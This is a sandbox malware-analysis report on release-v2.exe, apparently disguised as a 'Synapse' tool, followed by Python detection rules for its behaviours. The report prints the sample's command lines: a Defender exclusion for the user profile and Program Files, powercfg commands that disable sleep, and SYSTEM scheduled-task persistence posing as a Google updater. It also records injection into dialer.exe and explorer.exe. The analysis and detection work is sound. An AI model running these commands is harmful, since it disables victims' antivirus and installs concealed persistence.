Suspicious use of NtCreateUserProcessOtherParentProcess
| Description | Indicator | Process | Target |
| PID 2928 created 1268 | N/A | C:\Users\Admin\AppData\Local\Temp\SynapseFromWish\release-v2.exe | C:\Windows\Explorer.EXE |
Drops file in Drivers directory
| Description | Indicator | Process | Target |
| File created | C:\Windows\System32\drivers\etc\hosts | C:\Users\Admin\AppData\Local\Temp\SynapseFromWish\release-v2.exe | N/A |
Drops file in System32 directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 2928 set thread context of 2772 | N/A | C:\Users\Admin\AppData\Local\Temp\SynapseFromWish\release-v2.exe | C:\Windows\System32\dialer.exe |
Creates scheduled task(s)
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
Enumerates system info in registry
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0 | C:\Windows\system32\csrss.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\SYSTEM\MultifunctionAdapter\0\KeyboardController\0 | C:\Windows\system32\csrss.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\2 | C:\Windows\system32\csrss.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\2\Component Information | C:\Windows\system32\csrss.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\KeyboardController\0\KeyboardPeripheral\0\Component Information | C:\Windows\system32\csrss.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\1\Identifier | C:\Windows\system32\csrss.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\SYSTEM\MultifunctionAdapter\1\KeyboardController | C:\Windows\system32\csrss.exe | N/A |
| Key queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\1 | C:\Windows\system32\csrss.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\1\Configuration Data | C:\Windows\system32\csrss.exe | N/A |
| Key queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\2 | C:\Windows\system32\csrss.exe | N/A |
| Key queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\KeyboardController | C:\Windows\system32\csrss.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\KeyboardController\0\Component Information | C:\Windows\system32\csrss.exe | N/A |
| Key queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\KeyboardController\0\KeyboardPeripheral | C:\Windows\system32\csrss.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\Identifier | C:\Windows\system32\csrss.exe | N/A |
| Key queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0 | C:\Windows\system32\csrss.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\1 | C:\Windows\system32\csrss.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\KeyboardController\0\KeyboardPeripheral\0\Configuration Data | C:\Windows\system32\csrss.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\KeyboardController\0\Configuration Data | C:\Windows\system32\csrss.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter | C:\Windows\system32\csrss.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\SYSTEM\MultifunctionAdapter\0\KeyboardController\0\KeyboardPeripheral | C:\Windows\system32\csrss.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\1\Component Information | C:\Windows\system32\csrss.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\2\Configuration Data | C:\Windows\system32\csrss.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\KeyboardController\0\Identifier | C:\Windows\system32\csrss.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\SYSTEM\MultifunctionAdapter\0\KeyboardController | C:\Windows\system32\csrss.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\SYSTEM\MultifunctionAdapter\0\KeyboardController\0\KeyboardPeripheral\0 | C:\Windows\system32\csrss.exe | N/A |
| Key enumerated | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter | C:\Windows\system32\csrss.exe | N/A |
| Key enumerated | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0 | C:\Windows\system32\csrss.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\2\Identifier | C:\Windows\system32\csrss.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\KeyboardController\0\KeyboardPeripheral\0\Identifier | C:\Windows\system32\csrss.exe | N/A |
| Key queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter | C:\Windows\system32\csrss.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\Configuration Data | C:\Windows\system32\csrss.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\Component Information | C:\Windows\system32\csrss.exe | N/A |
Modifies data under HKEY_USERS
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\ThemeManager\LoadedBefore = "1" | C:\Windows\system32\winlogon.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\ThemeManager\LastLoadedDPI = "96" | C:\Windows\system32\winlogon.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\ThemeManager\DllName = "%SystemRoot%\\resources\\themes\\Aero\\Aero.msstyles" | C:\Windows\system32\winlogon.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\ThemeManager\ColorName = "NormalColor" | C:\Windows\system32\winlogon.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\ThemeManager\SizeName = "NormalSize" | C:\Windows\system32\winlogon.exe | N/A |
| Set value (data) | \REGISTRY\USER\.DEFAULT\Control Panel\Desktop\MuiCached\MachinePreferredUILanguages = 65006e002d00550053000000 | C:\Windows\system32\winlogon.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\ThemeManager | C:\Windows\system32\winlogon.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\ThemeManager\ThemeActive = "1" | C:\Windows\system32\winlogon.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\ThemeManager\LastUserLangID = "1033" | C:\Windows\system32\winlogon.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\SynapseFromWish\release-v2.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\SynapseFromWish\release-v2.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\SynapseFromWish\release-v2.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\SynapseFromWish\release-v2.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\SynapseFromWish\release-v2.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\SynapseFromWish\release-v2.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\SynapseFromWish\release-v2.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\SynapseFromWish\release-v2.exe | N/A |
| N/A | N/A | C:\Windows\System32\dialer.exe | N/A |
| N/A | N/A | C:\Windows\System32\dialer.exe | N/A |
| N/A | N/A | C:\Windows\System32\dialer.exe | N/A |
| N/A | N/A | C:\Windows\System32\dialer.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\dialer.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\System32\powercfg.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\System32\powercfg.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\System32\powercfg.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\system32\LogonUI.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\system32\LogonUI.exe | N/A |
Suspicious use of WriteProcessMemory
Uses Task Scheduler COM API
Processes
| Process | Command line |
| C:\Windows\system32\lsass.exe | C:\Windows\system32\lsass.exe |
| C:\Windows\system32\services.exe | C:\Windows\system32\services.exe |
| C:\Windows\system32\winlogon.exe | winlogon.exe |
| C:\Windows\system32\lsm.exe | C:\Windows\system32\lsm.exe |
| C:\Windows\Explorer.EXE | C:\Windows\Explorer.EXE |
| C:\Users\Admin\AppData\Local\Temp\SynapseFromWish\release-v2.exe | "C:\Users\Admin\AppData\Local\Temp\SynapseFromWish\release-v2.exe" |
| C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force |
| C:\Windows\System32\cmd.exe | C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0 |
| C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#eszkltr#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; } |
| C:\Windows\System32\dialer.exe | C:\Windows\System32\dialer.exe |
| C:\Windows\System32\powercfg.exe | powercfg /x -hibernate-timeout-ac 0 |
| C:\Windows\System32\powercfg.exe | powercfg /x -hibernate-timeout-dc 0 |
| C:\Windows\system32\Dwm.exe | "C:\Windows\system32\Dwm.exe" |
| C:\Windows\System32\powercfg.exe | powercfg /x -standby-timeout-ac 0 |
| C:\Windows\system32\schtasks.exe | "C:\Windows\system32\schtasks.exe" /create /f /sc onlogon /rl highest /ru System /tn GoogleUpdateTaskMachineQC /tr "'C:\Program Files\Google\Chrome\updater.exe'" |
| C:\Windows\system32\csrss.exe | %SystemRoot%\system32\csrss.exe ObjectDirectory=\Windows SharedSection=1024,20480,768 Windows=On SubSystemType=Windows ServerDll=basesrv,1 ServerDll=winsrv:UserServerDllInitialization,3 ServerDll=winsrv:ConServerDllInitialization,2 ServerDll=sxssrv,4 ProfileControl=Off MaxRequestThreads=16 |
| C:\Windows\system32\winlogon.exe | winlogon.exe |
| C:\Windows\system32\LogonUI.exe | "LogonUI.exe" /flags:0x0 |
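The process list above records the sample's host tradecraft end to end: a Defender exclusion covering the whole user profile and Program Files (Add-MpPreference -ExclusionPath), all four standby and hibernate timeouts zeroed with powercfg so the host never sleeps, persistence as a SYSTEM scheduled task at the highest run level whose name borrows Google's GoogleUpdateTaskMachine prefix while its action points at C:\Program Files\Google\Chrome\updater.exe, and a bare dialer.exe launch that goes on to hold SeDebugPrivilege and enumerate processes. As an added example (not part of this report or of the sandbox's own rule set), the Python below expresses those four behaviours as process-creation detection rules of the kind run over Sysmon Event ID 1 or Windows 4688 data, and exercises them against sample events constructed from the command lines shown here plus two benign controls. It generalizes slightly beyond the report (Set-MpPreference and the process/extension exclusion lists are also matched), and the directories assumed to hold Google's legitimate updater are an assumption, not something the report establishes.

```python
"""Process-creation detection rules for the behaviours recorded in this report.

Added example; not part of the sandbox report or its rule set. Events are
modelled as {"image": <path>, "cmdline": <command line>}, the two fields a
Sysmon Event ID 1 or Windows 4688 forwarder delivers.
"""
import re
from collections import Counter
from typing import Callable, Dict, List

Event = Dict[str, str]

# Constructed sample events modelled on the command lines in the process list
# above (the PowerShell task-creation line is trimmed to its Register-ScheduledTask
# branch), followed by two benign controls that must not fire.
SAMPLE_EVENTS: List[Event] = [
    {"image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": r"powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force"},
    {"image": r"C:\Windows\System32\cmd.exe",
     "cmdline": r"cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 "
                r"& powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0"},
    {"image": r"C:\Windows\system32\schtasks.exe",
     "cmdline": r'''"C:\Windows\system32\schtasks.exe" /create /f /sc onlogon /rl highest /ru System '''
                r'''/tn GoogleUpdateTaskMachineQC /tr "'C:\Program Files\Google\Chrome\updater.exe'"'''},
    {"image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": r"powershell.exe Register-ScheduledTask -Action (New-ScheduledTaskAction "
                r"-Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger "
                r"-AtStartup) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force"},
    {"image": r"C:\Windows\System32\dialer.exe", "cmdline": r"C:\Windows\System32\dialer.exe"},
    {"image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": r"powershell.exe Get-MpPreference"},                      # benign control
    {"image": r"C:\Windows\System32\powercfg.exe",
     "cmdline": r"powercfg /x -standby-timeout-ac 30"},                   # benign control
]


def _has(pattern: str, text: str) -> bool:
    return re.search(pattern, text, re.IGNORECASE) is not None


def defender_exclusion(ev: Event) -> bool:
    """Defender exclusion list widened from the command line (report: Add-MpPreference -ExclusionPath).
    Generalised to Set-MpPreference and the process/extension exclusion lists."""
    return _has(r"\b(Add|Set)-MpPreference\b.*-Exclusion(Path|Process|Extension)\b", ev["cmdline"])


def sleep_timeouts_zeroed(ev: Event) -> bool:
    """powercfg disabling a standby or hibernate timeout (report: all four AC/DC timeouts set to 0)."""
    return _has(r"\bpowercfg\b.*?-(hibernate|standby)-timeout-(ac|dc)\s+0(?!\d)", ev["cmdline"])


def system_task_created(ev: Event) -> bool:
    """Scheduled task created to run as SYSTEM at the highest run level, via schtasks.exe or the
    ScheduledTasks PowerShell module (report: both forms, task name GoogleUpdateTaskMachineQC)."""
    c = ev["cmdline"]
    creates = _has(r"\bschtasks(\.exe)?\b.*\s/create\b", c) or _has(r"\bRegister-ScheduledTask\b", c)
    as_system = _has(r"(/ru|-User)\s+['\"]?System\b", c)
    highest = _has(r"(/rl|-RunLevel)\s+['\"]?Highest\b", c)
    return creates and as_system and highest


TASK_NAME_RE = re.compile(r"(?:/tn|-TaskName)\s+['\"]?([^\s'\"]+)", re.I)
TASK_ACTION_RE = re.compile(r"(?:/tr|-Execute)\s+['\"]+([^'\"]+)", re.I)  # quoted action path, as in both forms above

# Assumption (not from the report): directories under which Google's own updater installs.
# A task wearing the GoogleUpdateTaskMachine name whose action lives elsewhere is a masquerade.
GOOGLE_UPDATER_DIRS = ("\\google\\update\\", "\\google\\googleupdater\\")


def google_updater_masquerade(ev: Event) -> bool:
    """Task named like Google's updater tasks but executing a binary outside Google's updater directories."""
    c = ev["cmdline"]
    name, action = TASK_NAME_RE.search(c), TASK_ACTION_RE.search(c)
    if not (name and action) or not name.group(1).lower().startswith("googleupdatetaskmachine"):
        return False
    return not any(d in action.group(1).lower() for d in GOOGLE_UPDATER_DIRS)


RARE_HOSTS = {"dialer.exe"}  # seeded with the binary this report shows; extend per environment


def lolbin_without_arguments(ev: Event) -> bool:
    """A rarely-used signed system binary launched as a bare path with no arguments (report: dialer.exe,
    which then acquires SeDebugPrivilege and enumerates processes)."""
    image = ev["image"].rsplit("\\", 1)[-1].lower()
    cmd = ev["cmdline"].strip().strip('"').lower()
    return image in RARE_HOSTS and cmd.endswith(image)


RULES: Dict[str, Callable[[Event], bool]] = {
    "defender_exclusion": defender_exclusion,
    "sleep_timeouts_zeroed": sleep_timeouts_zeroed,
    "system_task_created": system_task_created,
    "google_updater_masquerade": google_updater_masquerade,
    "lolbin_without_arguments": lolbin_without_arguments,
}


def classify(ev: Event) -> List[str]:
    """Names of every rule the event trips, in RULES order."""
    return [name for name, rule in RULES.items() if rule(ev)]


def scan(events: List[Event]) -> Dict[str, int]:
    """Rule -> number of events that tripped it (rules with no hits are omitted)."""
    return dict(Counter(name for ev in events for name in classify(ev)))


if __name__ == "__main__":
    for ev in SAMPLE_EVENTS:
        print(classify(ev) or ["-"], ev["cmdline"][:80])
    print(scan(SAMPLE_EVENTS))
```

The two task rules are deliberately separate: `system_task_created` fires on any SYSTEM/highest task creation and is the noisy, high-recall signal, while `google_updater_masquerade` is the precise one and depends on the assumed list of legitimate updater directories, which should be checked against the installed Google software before it is relied on. Matching on the action path rather than the task name alone is what lets a genuine GoogleUpdateTaskMachineUA or Core task pass.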
Network
Files
memory/2928-0-0x000000013F640000-0x000000013FC57000-memory.dmp
memory/2348-5-0x000000001B220000-0x000000001B502000-memory.dmp
memory/2348-6-0x000007FEF5400000-0x000007FEF5D9D000-memory.dmp
memory/2348-8-0x0000000001DA0000-0x0000000001DA8000-memory.dmp
memory/2348-9-0x0000000002360000-0x00000000023E0000-memory.dmp
memory/2348-10-0x0000000002360000-0x00000000023E0000-memory.dmp
memory/2348-7-0x0000000002360000-0x00000000023E0000-memory.dmp
memory/2348-11-0x000007FEF5400000-0x000007FEF5D9D000-memory.dmp
memory/2348-12-0x0000000002360000-0x00000000023E0000-memory.dmp
memory/2348-13-0x000007FEF5400000-0x000007FEF5D9D000-memory.dmp
memory/2772-16-0x0000000076D70000-0x0000000076F19000-memory.dmp
memory/2772-18-0x0000000076C50000-0x0000000076D6F000-memory.dmp
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
| MD5 | 903f5130e2a2dcee54994c201fcf5b62 |
| SHA1 | e2a9e0d806eef836d96840cc27f336558837d509 |
| SHA256 | 9489c6adc998572945ac76f05c8e87140a656240316f851dbbfdc0669b6b76c4 |
| SHA512 | 35b2bfb64500cd22d6bf0bb269665fed82c12e2c28019a6faeaf1d461599214670fb8a9fe41cbc96fb0d790abb698b0c88dbea591658b1cc54f8c106d7d04f24 |
memory/1900-25-0x000000001B270000-0x000000001B552000-memory.dmp
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\GACD2AQDNO4NNUNWMF57.temp
| MD5 | 903f5130e2a2dcee54994c201fcf5b62 |
| SHA1 | e2a9e0d806eef836d96840cc27f336558837d509 |
| SHA256 | 9489c6adc998572945ac76f05c8e87140a656240316f851dbbfdc0669b6b76c4 |
| SHA512 | 35b2bfb64500cd22d6bf0bb269665fed82c12e2c28019a6faeaf1d461599214670fb8a9fe41cbc96fb0d790abb698b0c88dbea591658b1cc54f8c106d7d04f24 |
memory/1900-27-0x000007FEF4A60000-0x000007FEF53FD000-memory.dmp
memory/420-26-0x0000000000720000-0x0000000000741000-memory.dmp
memory/420-24-0x0000000000720000-0x0000000000741000-memory.dmp
memory/1900-29-0x0000000002720000-0x00000000027A0000-memory.dmp
memory/1900-28-0x0000000002250000-0x0000000002258000-memory.dmp
memory/420-32-0x0000000000750000-0x0000000000777000-memory.dmp
memory/420-31-0x0000000000750000-0x0000000000777000-memory.dmp
memory/1900-38-0x0000000002720000-0x00000000027A0000-memory.dmp
memory/1900-37-0x000007FEF4A60000-0x000007FEF53FD000-memory.dmp
memory/464-40-0x0000000000980000-0x00000000009A7000-memory.dmp
memory/1900-39-0x0000000002720000-0x00000000027A0000-memory.dmp
memory/2928-35-0x000000013F640000-0x000000013FC57000-memory.dmp
memory/480-43-0x0000000000B10000-0x0000000000B37000-memory.dmp
memory/464-44-0x000007FEBEA40000-0x000007FEBEA50000-memory.dmp
memory/2772-47-0x0000000140000000-0x0000000140029000-memory.dmp
memory/480-48-0x000007FEBEA40000-0x000007FEBEA50000-memory.dmp
memory/464-50-0x0000000036DB0000-0x0000000036DC0000-memory.dmp
memory/480-53-0x0000000036DB0000-0x0000000036DC0000-memory.dmp
memory/480-61-0x0000000000B10000-0x0000000000B37000-memory.dmp
memory/464-63-0x0000000076DC1000-0x0000000076DC2000-memory.dmp
memory/1900-66-0x0000000002720000-0x00000000027A0000-memory.dmp
memory/488-65-0x0000000036DB0000-0x0000000036DC0000-memory.dmp
memory/488-64-0x000007FEBEA40000-0x000007FEBEA50000-memory.dmp
memory/2772-62-0x0000000076D70000-0x0000000076F19000-memory.dmp
memory/488-60-0x00000000003C0000-0x00000000003E7000-memory.dmp
memory/1900-69-0x000007FEF4A60000-0x000007FEF53FD000-memory.dmp
memory/488-68-0x00000000003C0000-0x00000000003E7000-memory.dmp
memory/2884-70-0x00000000026E0000-0x00000000026E1000-memory.dmp
memory/464-71-0x0000000000980000-0x00000000009A7000-memory.dmp
memory/2884-72-0x00000000026E0000-0x00000000026E1000-memory.dmp